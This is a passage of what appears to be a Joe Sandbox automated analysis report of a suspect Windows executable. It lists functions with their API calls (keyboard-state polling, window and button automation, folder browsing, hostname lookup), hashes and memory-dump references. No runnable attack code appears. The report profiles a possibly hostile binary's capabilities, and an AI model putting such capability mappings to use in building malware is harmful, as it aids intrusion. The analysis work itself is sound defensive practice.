                                                                    • Part of subcall function 0036DC38: timeGetTime.WINMM(?,75A4B400,003C58AB), ref: 0036DC3C
                                                                  • Sleep.KERNEL32(0000000A), ref: 003977C0
                                                                  • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 003977E4
                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00397806
                                                                  • SetActiveWindow.USER32 ref: 00397825
                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00397833
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00397852
                                                                  • Sleep.KERNEL32(000000FA), ref: 0039785D
                                                                  • IsWindow.USER32 ref: 00397869
                                                                  • EndDialog.USER32(00000000), ref: 0039787A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                  • String ID: BUTTON
                                                                  • API String ID: 1194449130-3405671355
                                                                  • Opcode ID: a75097d0e9e72b155c4eaa75b893e018a35efc916b4ea2f3ca0c1aff9670bfaa
                                                                  • Instruction ID: 75714c1ae40495bea10f5f5847b337ada35e9f4c6c3d4225834c176d72bf38a3
                                                                  • Opcode Fuzzy Hash: a75097d0e9e72b155c4eaa75b893e018a35efc916b4ea2f3ca0c1aff9670bfaa
                                                                  • Instruction Fuzzy Hash: B2218470259209AFEB035F60FC8DBB67F2DFB04346F004025F916861A1CB718C01CB68
                                                                  Function 003A02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • CoInitialize.OLE32(00000000), ref: 003A034B
                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003A03DE
                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 003A03F2
                                                                  • CoCreateInstance.OLE32(003DDA8C,00000000,00000001,00403CF8,?), ref: 003A043E
                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003A04AD
                                                                  • CoTaskMemFree.OLE32(?,?), ref: 003A0505
                                                                  • _memset.LIBCMT ref: 003A0542
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 003A057E
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003A05A1
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 003A05A8
                                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003A05DF
                                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 003A05E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                  • String ID:
                                                                  • API String ID: 1246142700-0
                                                                  • Opcode ID: af8525ec4b6c8b37942c50ce19189e497b70857d5bc6d422dd2fbff69ebc0466
                                                                  • Instruction ID: 9c3e4bc558deadd4bb6bc73f3dc792500552bc52c364d3f528d52369219c4b12
                                                                  • Opcode Fuzzy Hash: af8525ec4b6c8b37942c50ce19189e497b70857d5bc6d422dd2fbff69ebc0466
                                                                  • Instruction Fuzzy Hash: 9BB1D875A00209AFDB15DFA4C888DAEBBB9FF49305F158499E806EB261DB30ED45CF50
                                                                  Function 00392E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 00392ED6
                                                                  • SetKeyboardState.USER32(?), ref: 00392F41
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00392F61
                                                                  • GetKeyState.USER32(000000A0), ref: 00392F78
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00392FA7
                                                                  • GetKeyState.USER32(000000A1), ref: 00392FB8
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00392FE4
                                                                  • GetKeyState.USER32(00000011), ref: 00392FF2
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0039301B
                                                                  • GetKeyState.USER32(00000012), ref: 00393029
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00393052
                                                                  • GetKeyState.USER32(0000005B), ref: 00393060
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: adb82805bca0a1844a6b880bf5a5c2c82c99fcc75a5d6435b8b56c0f683363bb
                                                                  • Instruction ID: 14db3bd741a9bd384d312539b2a610999d4e511df705391786f9cc7fff92d0cc
                                                                  • Opcode Fuzzy Hash: adb82805bca0a1844a6b880bf5a5c2c82c99fcc75a5d6435b8b56c0f683363bb
                                                                  • Instruction Fuzzy Hash: DF51C661A04B8439FF37EBA488507EFBBB49F11344F09459ED5C25A1C2DA549B8CC7A2
                                                                  Function 0038ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000001), ref: 0038ED1E
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0038ED30
                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0038ED8E
                                                                  • GetDlgItem.USER32(?,00000002), ref: 0038ED99
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0038EDAB
                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0038EE01
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0038EE0F
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0038EE20
                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0038EE63
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0038EE71
                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0038EE8E
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0038EE9B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                  • String ID:
                                                                  • API String ID: 3096461208-0
                                                                  • Opcode ID: 520250bd206e9874191361418107346311dcc2c7f7cb5159618260da94977547
                                                                  • Instruction ID: 6f8ab6477cde82a1f1826d4ccd09bfbef6db2f24d0d371d4315a033f4366a233
                                                                  • Opcode Fuzzy Hash: 520250bd206e9874191361418107346311dcc2c7f7cb5159618260da94977547
                                                                  • Instruction Fuzzy Hash: 37512EB1B00205AFDB19DF68DD85AAEBBBAEB88300F558169F519D7290D770ED048B50
                                                                  Function 0036B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0036B759,?,00000000,?,?,?,?,0036B72B,00000000,?), ref: 0036BA58
                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0036B72B), ref: 0036B7F6
                                                                  • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0036B72B,00000000,?,?,0036B2EF,?,?), ref: 0036B88D
                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 003CD8A6
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0036B72B,00000000,?,?,0036B2EF,?,?), ref: 003CD8D7
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0036B72B,00000000,?,?,0036B2EF,?,?), ref: 003CD8EE
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0036B72B,00000000,?,?,0036B2EF,?,?), ref: 003CD90A
                                                                  • DeleteObject.GDI32(00000000), ref: 003CD91C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 641708696-0
                                                                  • Opcode ID: e24d5cbf53cf78f2a945f5c2c63d4f89f2658482122274006558e2c5821bb358
                                                                  • Instruction ID: 46cf0892a781300487966049726c7c99ebd407f898b4364a7c4c724e2bb2cb0d
                                                                  • Opcode Fuzzy Hash: e24d5cbf53cf78f2a945f5c2c63d4f89f2658482122274006558e2c5821bb358
                                                                  • Instruction Fuzzy Hash: BE612430501700DFDB279F18E988B65BBA9FF95315F16852EE1868BA78C771A8D0CF84
                                                                  Function 0036B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036B526: GetWindowLongW.USER32(?,000000EB), ref: 0036B537
                                                                  • GetSysColor.USER32(0000000F), ref: 0036B438
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ColorLongWindow
                                                                  • String ID:
                                                                  • API String ID: 259745315-0
                                                                  • Opcode ID: 2e98bbfef75c38c15b0e1532c0fc11cdebbfa52626a41106ae18d9f46fa320ae
                                                                  • Instruction ID: 25e4fb257954a764adaebd7524d1ebb648db7f84e81c96691555e2fa530f36e5
                                                                  • Opcode Fuzzy Hash: 2e98bbfef75c38c15b0e1532c0fc11cdebbfa52626a41106ae18d9f46fa320ae
                                                                  • Instruction Fuzzy Hash: 8341A3300011549FDB235F29EC89BB97B6AEB06731F158265FD65CE1EADB308C81DB21
                                                                  Function 0039690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                  • String ID:
                                                                  • API String ID: 136442275-0
                                                                  • Opcode ID: 63bb37b6049b121342fe3e7fc6d1c09f66c7f2efb13311e176ca14479c4f67ea
                                                                  • Instruction ID: 13ee9ea8082828ed9af3b06406c1640734947260016b19d9d50ced21234db781
                                                                  • Opcode Fuzzy Hash: 63bb37b6049b121342fe3e7fc6d1c09f66c7f2efb13311e176ca14479c4f67ea
                                                                  • Instruction Fuzzy Hash: 4C411EB784621CAECF77DB94CC46DDA73BCEB44310F0041A6F659AA051EA74ABE48F50
                                                                  Function 0039D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(003EDC00,003EDC00,003EDC00), ref: 0039D7CE
                                                                  • GetDriveTypeW.KERNEL32(?,00403A70,00000061), ref: 0039D898
                                                                  • _wcscpy.LIBCMT ref: 0039D8C2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                  • API String ID: 2820617543-1000479233
                                                                  • Opcode ID: 3515caa2c802460ab74c50da9dacc431b7ee058d9b12157dfcf64c5e4d2dbca2
                                                                  • Instruction ID: 2152c428eb73459b7a7349421dfff97856e5bf9be7a398e4733ab0c492dd1a0b
                                                                  • Opcode Fuzzy Hash: 3515caa2c802460ab74c50da9dacc431b7ee058d9b12157dfcf64c5e4d2dbca2
                                                                  • Instruction Fuzzy Hash: 335187751083409FCB12EF14D892A6FB7A9EF84354F20C92DF99A5B2A2DB71DD09CB41
                                                                  Function 0035936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __swprintf.LIBCMT ref: 003593AB
                                                                  • __itow.LIBCMT ref: 003593DF
                                                                    • Part of subcall function 00371557: _xtow@16.LIBCMT ref: 00371578
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __itow__swprintf_xtow@16
                                                                  • String ID: %.15g$0x%p$False$True
                                                                  • API String ID: 1502193981-2263619337
                                                                  • Opcode ID: bff481d588befdfae9226ea1cb2bca5a2f59bf81405cecb1af313158598bd3f5
                                                                  • Instruction ID: ee60614d0039fcc68a916cf1e40ede7b4dcf5de3b5138aa58e2cf7b953f8460d
                                                                  • Opcode Fuzzy Hash: bff481d588befdfae9226ea1cb2bca5a2f59bf81405cecb1af313158598bd3f5
                                                                  • Instruction Fuzzy Hash: EB41C576500204EFDB269B64D952F69B7E8EF44301F2084AFE549DB1A1EA319D45CB50
                                                                  Function 003BA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003BA259
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 003BA260
                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003BA273
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 003BA27B
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 003BA286
                                                                  • DeleteDC.GDI32(00000000), ref: 003BA28F
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 003BA299
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003BA2AD
                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003BA2B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                  • String ID: static
                                                                  • API String ID: 2559357485-2160076837
                                                                  • Opcode ID: 48ae9eb931e798f4b72741b7b37653931320bfb7d67b84075eb2c30f6d20225b
                                                                  • Instruction ID: cdd24f66021bfadd2a057ead837283e175c6cc919ffe985ef9ef77cb7bd95e0f
                                                                  • Opcode Fuzzy Hash: 48ae9eb931e798f4b72741b7b37653931320bfb7d67b84075eb2c30f6d20225b
                                                                  • Instruction Fuzzy Hash: FE317E31101615BFDF125FA4EC49FEA3B6DFF09364F110215FA19AA0A0C736D811DBA5
                                                                  Function 00396F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                  • String ID: 0.0.0.0
                                                                  • API String ID: 2620052-3771769585
                                                                  • Opcode ID: a90dd9b155b905016dccd00c412614e700f41e7c40551a77cb0a6f99f1fd6b77
                                                                  • Instruction ID: 865ba10e830ecb06c40614e0f5869fc37b237807b3940c61afb95a169ae927f1
                                                                  • Opcode Fuzzy Hash: a90dd9b155b905016dccd00c412614e700f41e7c40551a77cb0a6f99f1fd6b77
                                                                  • Instruction Fuzzy Hash: 5F110A71505215AFCF276B70BC0AEDA77ACDF40710F0140A6F14AAA081EFB4DE858B50
                                                                  Function 0037500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00375047
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  • __gmtime64_s.LIBCMT ref: 003750E0
                                                                  • __gmtime64_s.LIBCMT ref: 00375116
                                                                  • __gmtime64_s.LIBCMT ref: 00375133
                                                                  • __allrem.LIBCMT ref: 00375189
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003751A5
                                                                  • __allrem.LIBCMT ref: 003751BC
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003751DA
                                                                  • __allrem.LIBCMT ref: 003751F1
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0037520F
                                                                  • __invoke_watson.LIBCMT ref: 00375280
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                  • String ID:
                                                                  • API String ID: 384356119-0
                                                                  • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                  • Instruction ID: 48a1c94db39774159b4404f51d7228005df11d293b10c042a3def5f0bfbce970
                                                                  • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                  • Instruction Fuzzy Hash: 99711A71A00F16ABE73AAE78CC41B5A73A8BF14364F15C529F418DB681E7B8DD4087D0
                                                                  Function 00394DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00394DF8
                                                                  • GetMenuItemInfoW.USER32(00411708,000000FF,00000000,00000030), ref: 00394E59
                                                                  • SetMenuItemInfoW.USER32(00411708,00000004,00000000,00000030), ref: 00394E8F
                                                                  • Sleep.KERNEL32(000001F4), ref: 00394EA1
                                                                  • GetMenuItemCount.USER32(?), ref: 00394EE5
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00394F01
                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00394F2B
                                                                  • GetMenuItemID.USER32(?,?), ref: 00394F70
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00394FB6
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00394FCA
                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00394FEB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                  • String ID:
                                                                  • API String ID: 4176008265-0
                                                                  • Opcode ID: 3f01b14e49c4c437d7dae4fb1732252729b6c90b19c480e7ba0d23773dba1517
                                                                  • Instruction ID: d6983a5f3f85e07f8cb0e9aa6124d3af59294d7ac71316e05d7f06fb691e1825
                                                                  • Opcode Fuzzy Hash: 3f01b14e49c4c437d7dae4fb1732252729b6c90b19c480e7ba0d23773dba1517
                                                                  • Instruction Fuzzy Hash: CD617E7190024AAFDF23CFA4E884EAE7BB9FB45304F154199F542A7251D731AD46CB21
                                                                  Function 003B9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003B9C98
                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003B9C9B
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 003B9CBF
                                                                  • _memset.LIBCMT ref: 003B9CD0
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003B9CE2
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003B9D5A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
